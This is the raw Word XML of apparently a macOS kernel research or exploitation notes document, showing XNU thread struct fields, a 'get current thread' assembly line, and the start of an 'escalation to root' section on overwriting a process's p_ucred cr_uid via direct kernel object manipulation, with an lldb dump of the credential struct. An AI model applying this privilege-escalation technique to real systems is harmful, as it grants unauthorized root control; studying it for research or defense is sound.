          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> T_KPC_ALLOC             </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x40</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hread needs a kpc_buf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_chud</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HUD flags, used for Shar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chud_c_switch</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last dispatch detection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mutex_count</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total count of locks held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def</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KPC</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ccumulated performance counters for this thre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w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kpc_buf</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def</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KPERF</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unt of how many times a thread has been sampled since it was last schedul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kperf_pet_c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HYPERVISOR</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hypervisor virtual CPU object associated with this thre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hv_thread_targe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HYPERVISOR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thread_id</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system wide unique thread-id*/</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tatistics accumulated per-thread and aggregated per-tas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syscalls_unix</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syscalls_mach</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ledger_t        t_ledg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ledger_t        t_threadledg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er thread ledg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cpu_time_last_qo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def</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_BANK</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ledger_t        t_bankledger</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ledger to charge someone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64_t        t_deduct_bank_ledger_tim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pu time to be deducted from bank ledg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w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* policy is protected by the task lock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ask_requested_policy     requested_policy</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ask_effective_policy     effective_policy</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struct</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task_pended_policy        pended_policy</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usynch override is protected by the task lock, eventually will be thread mutex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usynch_override_contended_resource_cou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int</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iotier_overrid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atomic operations to set, cleared on ret to user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o_stat_info_t          thread_io_stats</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per-thread I/O statistics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eger_t       saved_importance</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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saved task-relative importance */</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hread_callout_interrupt_wakeup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hread_callout_platform_idle_wakeups</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hread_timer_wakeups_bin_1</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32_t            thread_timer_wakeups_bin_2</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16_t            thread_tag</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uint16_t            callout_woken_from_icontext</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callout_woken_from_platform_idle</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callout_woke_thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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thread_bitfield_unused</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>13</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Kernel holds on this threa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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    int16_t                     suspend_cou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User level suspensions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nt16_t                     user_stop_count</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mach_port_name_t        ith_voucher_name</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ipc_voucher_t           ith_voucher</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_IOSCHED</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decmp_upl</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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color w:val="008000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* CONFIG_IOSCHED */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0456" w:rsidRPr="004C0456" w:rsidRDefault="004C0456" w:rsidP="004C0456">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C0456">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0456" w:rsidRDefault="004C0456" w:rsidP="00A9161A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A9161A" w:rsidRPr="00A9161A" w:rsidRDefault="00A9161A" w:rsidP="00A9161A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc445313235"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Get current thread</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00205331" w:rsidRDefault="00A9161A" w:rsidP="00205331">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mov rax, </w:t>
      </w:r>
      <w:r w:rsidR="00205331">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gs:8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205331" w:rsidRDefault="00205331" w:rsidP="00205331">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A94D812" wp14:editId="0B31E30A">
            <wp:extent cx="5274310" cy="10872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87216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205331" w:rsidRDefault="00205331" w:rsidP="00205331">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DFA877" wp14:editId="064E88B1">
            <wp:extent cx="48450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5050" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00205331"/>
    <w:p w:rsidR="00132BFE" w:rsidRPr="00A9161A" w:rsidRDefault="003C0777" w:rsidP="00132BFE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc445313236"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Esclation to </w:t>
      </w:r>
      <w:r w:rsidR="00132BFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="003C0777" w:rsidRDefault="0032166C" w:rsidP="003C0777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DKOM p_ucred-&gt;cr_uid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00132BFE" w:rsidRDefault="00132BFE" w:rsidP="00205331"/>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">//Show all info of structure </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(lldb) expr -T -A -L   -- *((proc*)  0xffffff8010e4fcf0)-&gt;p_ucred</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758000: (ucred) $37 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758000:   (ucred::&lt;anonymous struct&gt;) cr_link = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758000:     (ucred *) tqe_next = 0xffffff8010a23d90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758008:     (ucred **) tqe_prev = 0xffffff800d4f5508</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758010:   (u_long) cr_ref = 51</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758018:   (posix_cred) cr_posix = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758018:     (uid_t)</w:t>
      </w:r>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> cr_uid</w:t>
      </w:r>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 501</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75801c:     (uid_t) cr_ruid = 501</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758020:     (uid_t) cr_svuid = 501</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758024:     (short) cr_ngroups = 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758028:     (gid_t [16]) cr_groups = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758028:       (unsigned int) [0] = 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75802c:       (unsigned int) [1] = 701</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758030:       (unsigned int) [2] = 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758034:       (unsigned int) [3] = 61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758038:       (unsigned int) [4] = 79</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75803c:       (unsigned int) [5] = 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758040:       (unsigned int) [6] = 81</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758044:       (unsigned int) [7] = 98</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x00007fc59a758048:       (unsigned int) [8] = 33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75804c:       (unsigned int) [9] = 100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758050:       (unsigned int) [10] = 204</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758054:       (unsigned int) [11] = 398</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758058:       (unsigned int) [12] = 399</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75805c:       (unsigned int) [13] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758060:       (unsigned int) [14] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758064:       (unsigned int) [15] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758068:     (gid_t) cr_rgid = 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a75806c:     (gid_t) cr_svgid = 20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758070:     (uid_t) cr_gmuid = 501</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758074:     (int) cr_flags = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758078:   (label *) cr_label = 0xffffff80101770c0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0032166C" w:rsidRPr="0032166C" w:rsidRDefault="0032166C" w:rsidP="0032166C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032166C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0x00007fc59a758080:   (au_session) cr_audit = {</w:t>
      </w:r>
    </w:p>
